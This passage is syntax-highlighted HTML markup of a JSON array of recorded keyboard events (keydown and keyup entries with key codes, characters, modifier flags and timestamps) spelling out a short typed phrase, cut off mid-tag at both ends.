class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5229.14</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5284.76</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5284.995</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"Space"</span><span class="p">,</span><span class="s2">" "</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5285.655</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"Space"</span><span class="p">,</span><span class="s2">" "</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5286.12</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5364.66</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5364.885</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"Space"</span><span class="p">,</span><span class="s2">" "</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5365.44</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"Space"</span><span class="p">,</span><span class="s2">" "</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5365.755</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"ShiftLeft"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5829.575</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"ShiftLeft"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5829.815</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"ShiftLeft"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5830.415</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"Quote"</span><span class="p">,</span><span class="s2">"\""</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5884.835</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"Quote"</span><span class="p">,</span><span class="s2">"\""</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5885.03</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"Quote"</span><span class="p">,</span><span class="s2">"\""</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5885.485</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"Quote"</span><span class="p">,</span><span class="s2">"\""</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5964.7</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"Quote"</span><span class="p">,</span><span class="s2">"\""</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5964.9</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"Quote"</span><span class="p">,</span><span class="s2">"\""</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5965.36</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"ShiftLeft"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6037.525</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"ShiftLeft"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6049.935</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"ShiftLeft"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6050.42</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"ShiftRight"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">2</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6118.395</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"ShiftRight"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">2</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6118.635</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"ShiftRight"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">2</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6119.11</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"ShiftRight"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">2</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6421.105</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"ShiftRight"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">2</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6421.315</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"ShiftRight"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">2</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6421.935</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"ShiftLeft"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6591.365</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"ShiftLeft"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6591.63</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"ShiftLeft"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6599.805</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"N"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6700.895</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"N"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6701.105</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"N"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6701.52</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"ShiftLeft"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6750.675</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"ShiftLeft"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6750.89</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"ShiftLeft"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6751.485</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6812.715</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6812.935</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6813.345</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6876.985</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6877.215</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">6877.625</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7028.745</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7029</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7029.53</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"Backspace"</span><span class="p">,</span><span class="s2">"Backspace"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7284.965</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"Backspace"</span><span class="p">,</span><span class="s2">"Backspace"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7285.195</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"Backspace"</span><span class="p">,</span><span class="s2">"Backspace"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7285.65</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"Backspace"</span><span class="p">,</span><span class="s2">"Backspace"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7340.71</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"Backspace"</span><span class="p">,</span><span class="s2">"Backspace"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7351.655</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"Backspace"</span><span class="p">,</span><span class="s2">"Backspace"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7352.085</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7477.275</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7477.5</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7478</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7557.17</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7557.385</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7557.94</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7588.785</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7589.005</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7598.42</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyH"</span><span class="p">,</span><span class="s2">"h"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7638.385</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyH"</span><span class="p">,</span><span class="s2">"h"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7638.625</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyH"</span><span class="p">,</span><span class="s2">"h"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7639.2</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7677.26</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7677.46</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7677.875</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyH"</span><span class="p">,</span><span class="s2">"h"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7700.72</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyH"</span><span class="p">,</span><span class="s2">"h"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7700.92</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyH"</span><span class="p">,</span><span class="s2">"h"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7701.465</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyI"</span><span class="p">,</span><span class="s2">"i"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7789.075</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyI"</span><span class="p">,</span><span class="s2">"i"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7789.31</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyI"</span><span class="p">,</span><span class="s2">"i"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7789.96</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7845.03</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7845.26</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7845.695</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyI"</span><span class="p">,</span><span class="s2">"i"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7916.815</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyI"</span><span class="p">,</span><span class="s2">"i"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7917.045</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyI"</span><span class="p">,</span><span class="s2">"i"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7917.645</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyG"</span><span class="p">,</span><span class="s2">"g"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7918.16</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyG"</span><span class="p">,</span><span class="s2">"g"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7929.995</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyG"</span><span class="p">,</span><span class="s2">"g"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7930.395</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8012.685</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8012.895</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8013.475</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyG"</span><span class="p">,</span><span class="s2">"g"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8068.8</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyG"</span><span class="p">,</span><span class="s2">"g"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8069</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyG"</span><span class="p">,</span><span class="s2">"g"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8069.425</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyA"</span><span class="p">,</span><span class="s2">"a"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8349.005</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyA"</span><span class="p">,</span><span class="s2">"a"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8349.215</span><span 